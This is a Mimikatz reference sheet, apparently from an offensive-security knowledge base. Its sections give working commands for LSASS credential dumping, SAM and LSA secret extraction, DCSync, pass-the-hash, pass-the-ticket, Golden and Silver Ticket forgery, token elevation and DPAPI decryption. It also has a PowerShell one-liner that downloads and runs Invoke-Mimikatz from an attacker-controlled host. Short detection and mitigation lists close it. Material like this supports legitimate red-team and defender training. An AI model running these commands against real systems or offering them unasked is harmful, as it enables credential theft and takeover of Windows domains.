Mimikatz
Overview
Mimikatz is a Windows post-exploitation tool for extracting credentials from memory, forging Kerberos tickets, and manipulating Windows authentication. It runs on the target Windows system and requires administrator or SYSTEM privileges for most operations. Mimikatz is the primary tool for LSASS credential dumping, Golden/Silver Ticket attacks, and pass-the-hash/pass-the-ticket on Windows.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1003.001 - OS Credential Dumping: LSASS Memory
Key Modules
sekurlsa — Credential Extraction
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Dump all credentials from LSASS
mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords
# Export all Kerberos tickets from memory
mimikatz# sekurlsa::tickets /export
# Pass-the-hash — spawn process with NTLM hash
mimikatz# sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>
# Pass-the-hash with AES key
mimikatz# sekurlsa::pth /user:<user> /domain:<domain> /aes256:<key>
# Dump cached credentials
mimikatz# sekurlsa::msv
mimikatz# sekurlsa::wdigest
mimikatz# sekurlsa::kerberos
lsadump — SAM/NTDS/DCSync
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Dump local SAM database
mimikatz# lsadump::sam
# Dump SAM from hive files
mimikatz# lsadump::sam /sam:SAM /system:SYSTEM
# Dump LSA secrets
mimikatz# lsadump::secrets
# Dump cached domain credentials
mimikatz# lsadump::cache
# DCSync — replicate specific user's credentials
mimikatz# lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz# lsadump::dcsync /domain:<domain> /user:krbtgt
# DCSync — all users
mimikatz# lsadump::dcsync /domain:<domain> /all /csv
kerberos — Ticket Operations
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# List current Kerberos tickets
mimikatz# kerberos::list
# Export tickets to .kirbi files
mimikatz# kerberos::list /export
# Purge all tickets
mimikatz# kerberos::purge
# Pass the ticket — inject .kirbi into session
mimikatz# kerberos::ptt <ticket.kirbi>
# Golden Ticket — forge TGT
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<hash> /ptt
# Silver Ticket — forge TGS
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /target:<host> /service:cifs /rc4:<hash> /ptt
token — Token Manipulation
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Elevate to SYSTEM
mimikatz# token::elevate
# Elevate to domain admin (if token available)
mimikatz# token::elevate /domainadmin
# Revert to original token
mimikatz# token::revert
vault / dpapi — Credential Stores
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# List Windows Credential Manager entries
mimikatz# vault::list
# DPAPI masterkey extraction
mimikatz# dpapi::masterkey /in:<masterkey_file> /sid:<user_sid> /password:<password>
# Decrypt DPAPI credential blob
mimikatz# dpapi::cred /in:<credential_file> /masterkey:<masterkey>
Common Workflows
Initial Setup
# Enable debug privilege (required for most operations)
mimikatz# privilege::debug
# Check if running as SYSTEM
mimikatz# token::whoami
One-Liner Execution
:: Run mimikatz with commands inline
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
:: DCSync one-liner
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.local /user:Administrator" "exit"
PowerShell (Invoke-Mimikatz)
# Download and execute in memory
IEX (New-Object Net.WebClient).DownloadString('http://<attacker>/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
Detection Methods
Host-Based Detection
- Process named
mimikatz.exeormimi.exe - LSASS process access from non-system processes (Sysmon Event 10)
- DLL injection into LSASS
- String patterns:
mimikatz,gentilkiwi,sekurlsa - AMSI detections for PowerShell-based Mimikatz
Mitigation Strategies
- Credential Guard — prevents LSASS from storing cleartext passwords and NTLM hashes
- Protected Process Light (PPL) — prevents non-protected processes from accessing LSASS
- Disable WDigest — prevent cleartext password caching (registry key
UseLogonCredential) - LSASS protection — enable RunAsPPL in the registry